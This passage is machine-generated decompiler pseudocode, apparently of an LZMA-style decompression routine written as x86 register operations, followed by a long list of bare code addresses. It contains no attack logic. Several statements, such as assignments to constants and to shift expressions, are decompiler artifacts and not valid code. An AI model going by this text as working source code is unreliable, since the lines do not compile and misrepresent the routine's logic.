                                                                        								goto L37;
                                                                        							}
                                                                        						case 0xe:
                                                                        							L46:
                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                        								 *(__ebp - 0x88) = 0xe;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x70);
                                                                        							__eax =  *(__ebp - 0xc);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							_t156 = __ebp - 0x70;
                                                                        							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                        							__eflags =  *_t156;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							while(1) {
                                                                        								L48:
                                                                        								__eflags = __ebx - 0x100;
                                                                        								if(__ebx >= 0x100) {
                                                                        									break;
                                                                        								}
                                                                        								__eax =  *(__ebp - 0x58);
                                                                        								__edx = __ebx + __ebx;
                                                                        								__ecx =  *(__ebp - 0x10);
                                                                        								__esi = __edx + __eax;
                                                                        								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        								__ax =  *__esi;
                                                                        								 *(__ebp - 0x54) = __esi;
                                                                        								__edi = __ax & 0x0000ffff;
                                                                        								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        								if( *(__ebp - 0xc) >= __ecx) {
                                                                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        									__cx = __ax;
                                                                        									_t170 = __edx + 1; // 0x1
                                                                        									__ebx = _t170;
                                                                        									__cx = __ax >> 5;
                                                                        									__eflags = __eax;
                                                                        									 *__esi = __ax;
                                                                        								} else {
                                                                        									 *(__ebp - 0x10) = __ecx;
                                                                        									0x800 = 0x800 - __edi;
                                                                        									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        									__ebx = __ebx + __ebx;
                                                                        									 *__esi = __cx;
                                                                        								}
                                                                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                        								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        									continue;
                                                                        								} else {
                                                                        									goto L46;
                                                                        								}
                                                                        							}
                                                                        							L54:
                                                                        							_t173 = __ebp - 0x34;
                                                                        							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                        							__eflags =  *_t173;
                                                                        							goto L55;
                                                                        						case 0xf:
                                                                        							L58:
                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                        								 *(__ebp - 0x88) = 0xf;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x70);
                                                                        							__eax =  *(__ebp - 0xc);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							_t203 = __ebp - 0x70;
                                                                        							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                        							__eflags =  *_t203;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							L60:
                                                                        							__eflags = __ebx - 0x100;
                                                                        							if(__ebx >= 0x100) {
                                                                        								L55:
                                                                        								__al =  *(__ebp - 0x44);
                                                                        								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                        								goto L56;
                                                                        							}
                                                                        							L61:
                                                                        							__eax =  *(__ebp - 0x58);
                                                                        							__edx = __ebx + __ebx;
                                                                        							__ecx =  *(__ebp - 0x10);
                                                                        							__esi = __edx + __eax;
                                                                        							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        							__ax =  *__esi;
                                                                        							 *(__ebp - 0x54) = __esi;
                                                                        							__edi = __ax & 0x0000ffff;
                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        								__cx = __ax;
                                                                        								_t217 = __edx + 1; // 0x1
                                                                        								__ebx = _t217;
                                                                        								__cx = __ax >> 5;
                                                                        								__eflags = __eax;
                                                                        								 *__esi = __ax;
                                                                        							} else {
                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                        								0x800 = 0x800 - __edi;
                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        								__ebx = __ebx + __ebx;
                                                                        								 *__esi = __cx;
                                                                        							}
                                                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        							 *(__ebp - 0x44) = __ebx;
                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        								goto L60;
                                                                        							} else {
                                                                        								goto L58;
                                                                        							}
                                                                        						case 0x10:
                                                                        							L109:
                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                        								 *(__ebp - 0x88) = 0x10;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x70);
                                                                        							__eax =  *(__ebp - 0xc);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							_t365 = __ebp - 0x70;
                                                                        							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                        							__eflags =  *_t365;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							goto L111;
                                                                        						case 0x11:
                                                                        							goto L69;
                                                                        						case 0x12:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								__eax =  *(__ebp - 0x58);
                                                                        								 *(__ebp - 0x84) = 0x13;
                                                                        								__esi =  *(__ebp - 0x58) + 2;
                                                                        								goto L132;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x4c);
                                                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                        							__ecx =  *(__ebp - 0x58);
                                                                        							__eax =  *(__ebp - 0x4c) << 4;
                                                                        							__eflags = __eax;
                                                                        							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                        							goto L130;
                                                                        						case 0x13:
                                                                        							__eflags =  *(__ebp - 0x40);
                                                                        							if( *(__ebp - 0x40) != 0) {
                                                                        								_t469 = __ebp - 0x58;
                                                                        								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                        								__eflags =  *_t469;
                                                                        								 *(__ebp - 0x30) = 0x10;
                                                                        								 *(__ebp - 0x40) = 8;
                                                                        								L144:
                                                                        								 *(__ebp - 0x7c) = 0x14;
                                                                        								goto L145;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x4c);
                                                                        							__ecx =  *(__ebp - 0x58);
                                                                        							__eax =  *(__ebp - 0x4c) << 4;
                                                                        							 *(__ebp - 0x30) = 8;
                                                                        							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                        							L130:
                                                                        							 *(__ebp - 0x58) = __eax;
                                                                        							 *(__ebp - 0x40) = 3;
                                                                        							goto L144;
                                                                        						case 0x14:
                                                                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                        							__eax =  *(__ebp - 0x80);
                                                                        							goto L140;
                                                                        						case 0x15:
                                                                        							__eax = 0;
                                                                        							__eflags =  *(__ebp - 0x38) - 7;
                                                                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        							__al = __al & 0x000000fd;
                                                                        							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                        							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                        							goto L120;
                                                                        						case 0x16:
                                                                        							__eax =  *(__ebp - 0x30);
                                                                        							__eflags = __eax - 4;
                                                                        							if(__eax >= 4) {
                                                                        								_push(3);
                                                                        								_pop(__eax);
                                                                        							}
                                                                        							__ecx =  *(__ebp - 4);
                                                                        							 *(__ebp - 0x40) = 6;
                                                                        							__eax = __eax << 7;
                                                                        							 *(__ebp - 0x7c) = 0x19;
                                                                        							 *(__ebp - 0x58) = __eax;
                                                                        							goto L145;
                                                                        						case 0x17:
                                                                        							L145:
                                                                        							__eax =  *(__ebp - 0x40);
                                                                        							 *(__ebp - 0x50) = 1;
                                                                        							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                        							goto L149;
                                                                        						case 0x18:
                                                                        							L146:
                                                                        							__eflags =  *(__ebp - 0x6c);
                                                                        							if( *(__ebp - 0x6c) == 0) {
                                                                        								 *(__ebp - 0x88) = 0x18;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x70);
                                                                        							__eax =  *(__ebp - 0xc);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							_t484 = __ebp - 0x70;
                                                                        							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                        							__eflags =  *_t484;
                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        							L148:
                                                                        							_t487 = __ebp - 0x48;
                                                                        							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                        							__eflags =  *_t487;
                                                                        							L149:
                                                                        							__eflags =  *(__ebp - 0x48);
                                                                        							if( *(__ebp - 0x48) <= 0) {
                                                                        								__ecx =  *(__ebp - 0x40);
                                                                        								__ebx =  *(__ebp - 0x50);
                                                                        								0 = 1;
                                                                        								__eax = 1 << __cl;
                                                                        								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                        								__eax =  *(__ebp - 0x7c);
                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                        								goto L140;
                                                                        							}
                                                                        							__eax =  *(__ebp - 0x50);
                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        							__eax =  *(__ebp - 0x58);
                                                                        							__esi = __edx + __eax;
                                                                        							 *(__ebp - 0x54) = __esi;
                                                                        							__ax =  *__esi;
                                                                        							__edi = __ax & 0x0000ffff;
                                                                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        							if( *(__ebp - 0xc) >= __ecx) {
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        								__cx = __ax;
                                                                        								__cx = __ax >> 5;
                                                                        								__eax = __eax - __ecx;
                                                                        								__edx = __edx + 1;
                                                                        								__eflags = __edx;
                                                                        								 *__esi = __ax;
                                                                        								 *(__ebp - 0x50) = __edx;
                                                                        							} else {
                                                                        								 *(__ebp - 0x10) = __ecx;
                                                                        								0x800 = 0x800 - __edi;
                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        								 *__esi = __cx;
                                                                        							}
                                                                        							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        								goto L148;
                                                                        							} else {
                                                                        								goto L146;
                                                                        							}
                                                                        						case 0x19:
                                                                        							__eflags = __ebx - 4;
                                                                        							if(__ebx < 4) {
                                                                        								 *(__ebp - 0x2c) = __ebx;
                                                                        								L119:
                                                                        								_t393 = __ebp - 0x2c;
                                                                        								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                        								__eflags =  *_t393;
                                                                        								L120:
                                                                        								__eax =  *(__ebp - 0x2c);
                                                                        								__eflags = __eax;
                                                                        								if(__eax == 0) {
                                                                        									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                        									goto L170;
                                                                        								}
                                                                        								__eflags = __eax -  *(__ebp - 0x60);
                                                                        								if(__eax >  *(__ebp - 0x60)) {
                                                                        									goto L171;
                                                                        								}
                                                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                        								__eax =  *(__ebp - 0x30);
                                                                        								_t400 = __ebp - 0x60;
                                                                        								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                        								__eflags =  *_t400;
                                                                        								goto L123;
                                                                        							}
                                                                        							__ecx = __ebx;
                                                                        							__eax = __ebx;
                                                                        							__ecx = __ebx >> 1;
                                                                        							__eax = __ebx & 0x00000001;
                                                                        							__ecx = (__ebx >> 1) - 1;
                                                                        							__al = __al | 0x00000002;
                                                                        							__eax = (__ebx & 0x00000001) << __cl;
                                                                        							__eflags = __ebx - 0xe;
                                                                        							 *(__ebp - 0x2c) = __eax;
                                                                        							if(__ebx >= 0xe) {
                                                                        								__ebx = 0;
                                                                        								 *(__ebp - 0x48) = __ecx;
                                                                        								L102:
                                                                        								__eflags =  *(__ebp - 0x48);
                                                                        								if( *(__ebp - 0x48) <= 0) {
                                                                        									__eax = __eax + __ebx;
                                                                        									 *(__ebp - 0x40) = 4;
                                                                        									 *(__ebp - 0x2c) = __eax;
                                                                        									__eax =  *(__ebp - 4);
                                                                        									__eax =  *(__ebp - 4) + 0x644;
                                                                        									__eflags = __eax;
                                                                        									L108:
                                                                        									__ebx = 0;
                                                                        									 *(__ebp - 0x58) = __eax;
                                                                        									 *(__ebp - 0x50) = 1;
                                                                        									 *(__ebp - 0x44) = 0;
                                                                        									 *(__ebp - 0x48) = 0;
                                                                        									L112:
                                                                        									__eax =  *(__ebp - 0x40);
                                                                        									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                        										_t391 = __ebp - 0x2c;
                                                                        										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                        										__eflags =  *_t391;
                                                                        										goto L119;
                                                                        									}
                                                                        									__eax =  *(__ebp - 0x50);
                                                                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        									__eax =  *(__ebp - 0x58);
                                                                        									__esi = __edi + __eax;
                                                                        									 *(__ebp - 0x54) = __esi;
                                                                        									__ax =  *__esi;
                                                                        									__ecx = __ax & 0x0000ffff;
                                                                        									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                        									__eflags =  *(__ebp - 0xc) - __edx;
                                                                        									if( *(__ebp - 0xc) >= __edx) {
                                                                        										__ecx = 0;
                                                                        										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                        										__ecx = 1;
                                                                        										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                        										__ebx = 1;
                                                                        										__ecx =  *(__ebp - 0x48);
                                                                        										__ebx = 1 << __cl;
                                                                        										__ecx = 1 << __cl;
                                                                        										__ebx =  *(__ebp - 0x44);
                                                                        										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                        										__cx = __ax;
                                                                        										__cx = __ax >> 5;
                                                                        										__eax = __eax - __ecx;
                                                                        										__edi = __edi + 1;
                                                                        										__eflags = __edi;
                                                                        										 *(__ebp - 0x44) = __ebx;
                                                                        										 *__esi = __ax;
                                                                        										 *(__ebp - 0x50) = __edi;
                                                                        									} else {
                                                                        										 *(__ebp - 0x10) = __edx;
                                                                        										0x800 = 0x800 - __ecx;
                                                                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                        										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        										 *__esi = __dx;
                                                                        									}
                                                                        									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        										L111:
                                                                        										_t368 = __ebp - 0x48;
                                                                        										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                        										__eflags =  *_t368;
                                                                        										goto L112;
                                                                        									} else {
                                                                        										goto L109;
                                                                        									}
                                                                        								}
                                                                        								__ecx =  *(__ebp - 0xc);
                                                                        								__ebx = __ebx + __ebx;
                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                        								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                        								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                        									__ecx =  *(__ebp - 0x10);
                                                                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        									__ebx = __ebx | 0x00000001;
                                                                        									__eflags = __ebx;
                                                                        									 *(__ebp - 0x44) = __ebx;
                                                                        								}
                                                                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        									L101:
                                                                        									_t338 = __ebp - 0x48;
                                                                        									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                        									__eflags =  *_t338;
                                                                        									goto L102;
                                                                        								} else {
                                                                        									goto L99;
                                                                        								}
                                                                        							}
                                                                        							__edx =  *(__ebp - 4);
                                                                        							__eax = __eax - __ebx;
                                                                        							 *(__ebp - 0x40) = __ecx;
                                                                        							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                        							goto L108;
                                                                        						case 0x1a:
                                                                        							L56:
                                                                        							__eflags =  *(__ebp - 0x64);
                                                                        							if( *(__ebp - 0x64) == 0) {
                                                                        								 *(__ebp - 0x88) = 0x1a;
                                                                        								goto L170;
                                                                        							}
                                                                        							__ecx =  *(__ebp - 0x68);
                                                                        							__al =  *(__ebp - 0x5c);
                                                                        							__edx =  *(__ebp - 8);
                                                                        							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        							 *( *(__ebp - 0x68)) = __al;
                                                                        							__ecx =  *(__ebp - 0x14);
                                                                        							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                        							__eax = __ecx + 1;
                                                                        							__edx = 0;
                                                                        							_t192 = __eax %  *(__ebp - 0x74);
                                                                        							__eax = __eax /  *(__ebp - 0x74);
                                                                        							__edx = _t192;
                                                                        							goto L79;
                                                                        						case 0x1b:
                                                                        							goto L75;
                                                                        						case 0x1c:
                                                                        							while(1) {
                                                                        								L123:
                                                                        								__eflags =  *(__ebp - 0x64);
                                                                        								if( *(__ebp - 0x64) == 0) {
                                                                        									break;
                                                                        								}
                                                                        								__eax =  *(__ebp - 0x14);
                                                                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        								__eflags = __eax -  *(__ebp - 0x74);
                                                                        								if(__eax >=  *(__ebp - 0x74)) {
                                                                        									__eax = __eax +  *(__ebp - 0x74);
                                                                        									__eflags = __eax;
                                                                        								}
                                                                        								__edx =  *(__ebp - 8);
                                                                        								__cl =  *(__eax + __edx);
                                                                        								__eax =  *(__ebp - 0x14);
                                                                        								 *(__ebp - 0x5c) = __cl;
                                                                        								 *(__eax + __edx) = __cl;
                                                                        								__eax = __eax + 1;
                                                                        								__edx = 0;
                                                                        								_t414 = __eax %  *(__ebp - 0x74);
                                                                        								__eax = __eax /  *(__ebp - 0x74);
                                                                        								__edx = _t414;
                                                                        								__eax =  *(__ebp - 0x68);
                                                                        								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                        								__eflags =  *(__ebp - 0x30);
                                                                        								 *( *(__ebp - 0x68)) = __cl;
                                                                        								 *(__ebp - 0x14) = _t414;
                                                                        								if( *(__ebp - 0x30) > 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									goto L80;
                                                                        								}
                                                                        							}
                                                                        							 *(__ebp - 0x88) = 0x1c;
                                                                        							goto L170;
                                                                        					}
                                                                        				}
                                                                        			}













                                                                        0x00000000
                                                                        0x004070ab
                                                                        0x004070ab
                                                                        0x004070af
                                                                        0x00407166
                                                                        0x00407169
                                                                        0x00407175
                                                                        0x00407056
                                                                        0x00407056
                                                                        0x00407059
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073d4
                                                                        0x004073da
                                                                        0x004073e0
                                                                        0x004073fa
                                                                        0x004073fd
                                                                        0x00407403
                                                                        0x0040740e
                                                                        0x00407410
                                                                        0x004073e2
                                                                        0x004073e2
                                                                        0x004073f1
                                                                        0x004073f5
                                                                        0x004073f5
                                                                        0x0040741a
                                                                        0x00407441
                                                                        0x00407441
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x0040741c
                                                                        0x0040741c
                                                                        0x00407420
                                                                        0x004075cf
                                                                        0x00000000
                                                                        0x004075cf
                                                                        0x0040742c
                                                                        0x00407433
                                                                        0x0040743b
                                                                        0x0040743e
                                                                        0x00000000
                                                                        0x0040743e
                                                                        0x004070b5
                                                                        0x004070b9
                                                                        0x004075fa
                                                                        0x004075fa
                                                                        0x004075fd
                                                                        0x00407601
                                                                        0x00407601
                                                                        0x004070bf
                                                                        0x004070c5
                                                                        0x004070c8
                                                                        0x004070cc
                                                                        0x004070cf
                                                                        0x004070d3
                                                                        0x00407599
                                                                        0x004075e5
                                                                        0x004075ed
                                                                        0x004075f4
                                                                        0x004075f6
                                                                        0x00000000
                                                                        0x004075f6
                                                                        0x004070d9
                                                                        0x004070dc
                                                                        0x004070e2
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e7
                                                                        0x004070ea
                                                                        0x004070ed
                                                                        0x004070f0
                                                                        0x004070f3
                                                                        0x004070f6
                                                                        0x004070f7
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070fc
                                                                        0x004070ff
                                                                        0x00407102
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407108
                                                                        0x0040710a
                                                                        0x0040710a
                                                                        0x0040710d
                                                                        0x0040710d
                                                                        0x0040710d
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406bec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x00000000
                                                                        0x00406bfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c06
                                                                        0x00406c09
                                                                        0x00406c0c
                                                                        0x00406c10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c16
                                                                        0x00406c19
                                                                        0x00406c1b
                                                                        0x00406c1c
                                                                        0x00406c1f
                                                                        0x00406c21
                                                                        0x00406c22
                                                                        0x00406c24
                                                                        0x00406c27
                                                                        0x00406c2c
                                                                        0x00406c31
                                                                        0x00406c3a
                                                                        0x00406c4d
                                                                        0x00406c50
                                                                        0x00406c5c
                                                                        0x00406c84
                                                                        0x00406c86
                                                                        0x00406c94
                                                                        0x00406c94
                                                                        0x00406c98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c88
                                                                        0x00406c8b
                                                                        0x00406c8c
                                                                        0x00406c8c
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c62
                                                                        0x00406c67
                                                                        0x00406c67
                                                                        0x00406c70
                                                                        0x00406c78
                                                                        0x00406c7b
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c9e
                                                                        0x00406c9e
                                                                        0x00406ca2
                                                                        0x0040754e
                                                                        0x00000000
                                                                        0x0040754e
                                                                        0x00406cab
                                                                        0x00406cbb
                                                                        0x00406cbe
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc4
                                                                        0x00406cc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406cca
                                                                        0x00406cd0
                                                                        0x00406cfa
                                                                        0x00406d00
                                                                        0x00406d07
                                                                        0x00000000
                                                                        0x00406d07
                                                                        0x00406cd6
                                                                        0x00406cd9
                                                                        0x00406cde
                                                                        0x00406cde
                                                                        0x00406ce9
                                                                        0x00406cf1
                                                                        0x00406cf4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d39
                                                                        0x00406d3f
                                                                        0x00406d42
                                                                        0x00406d4f
                                                                        0x00406d57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d0e
                                                                        0x00406d0e
                                                                        0x00406d12
                                                                        0x0040755d
                                                                        0x00000000
                                                                        0x0040755d
                                                                        0x00406d1e
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d2c
                                                                        0x00406d2f
                                                                        0x00406d32
                                                                        0x00406d37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d5f
                                                                        0x00406d61
                                                                        0x00406d64
                                                                        0x00406dd5
                                                                        0x00406dd8
                                                                        0x00406ddb
                                                                        0x00406de2
                                                                        0x00406dec
                                                                        0x00000000
                                                                        0x00406dec
                                                                        0x00406d66
                                                                        0x00406d6a
                                                                        0x00406d6d
                                                                        0x00406d6f
                                                                        0x00406d72
                                                                        0x00406d75
                                                                        0x00406d77
                                                                        0x00406d7a
                                                                        0x00406d7c
                                                                        0x00406d81
                                                                        0x00406d84
                                                                        0x00406d87
                                                                        0x00406d8b
                                                                        0x00406d92
                                                                        0x00406d95
                                                                        0x00406d9c
                                                                        0x00406da0
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406dac
                                                                        0x00406daf
                                                                        0x00406dcd
                                                                        0x00406dcf
                                                                        0x00000000
                                                                        0x00406db1
                                                                        0x00406db1
                                                                        0x00406db4
                                                                        0x00406db7
                                                                        0x00406dba
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbf
                                                                        0x00406dc2
                                                                        0x00406dc4
                                                                        0x00406dc5
                                                                        0x00406dc8
                                                                        0x00000000
                                                                        0x00406dc8
                                                                        0x00000000
                                                                        0x00406ffe
                                                                        0x00407002
                                                                        0x00407020
                                                                        0x00407023
                                                                        0x0040702a
                                                                        0x0040702d
                                                                        0x00407030
                                                                        0x00407033
                                                                        0x00407036
                                                                        0x00407039
                                                                        0x0040703b
                                                                        0x00407042
                                                                        0x00407043
                                                                        0x00407045
                                                                        0x00407048
                                                                        0x0040704b
                                                                        0x0040704e
                                                                        0x0040704e
                                                                        0x00407053
                                                                        0x00000000
                                                                        0x00407053
                                                                        0x00407004
                                                                        0x00407007
                                                                        0x0040700a
                                                                        0x00407014
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407068
                                                                        0x0040706c
                                                                        0x0040708f
                                                                        0x00407092
                                                                        0x00407095
                                                                        0x0040709f
                                                                        0x0040706e
                                                                        0x0040706e
                                                                        0x00407071
                                                                        0x00407074
                                                                        0x00407077
                                                                        0x00407084
                                                                        0x00407087
                                                                        0x00407087
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040711c
                                                                        0x00407120
                                                                        0x00407127
                                                                        0x0040712a
                                                                        0x0040712d
                                                                        0x00407137
                                                                        0x00000000
                                                                        0x00407137
                                                                        0x00407122
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407143
                                                                        0x00407147
                                                                        0x0040714e
                                                                        0x00407151
                                                                        0x00407154
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407157
                                                                        0x0040715a
                                                                        0x0040715d
                                                                        0x0040715d
                                                                        0x00407160
                                                                        0x00407163
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407203
                                                                        0x00407203
                                                                        0x00407207
                                                                        0x004075a5
                                                                        0x00000000
                                                                        0x004075a5
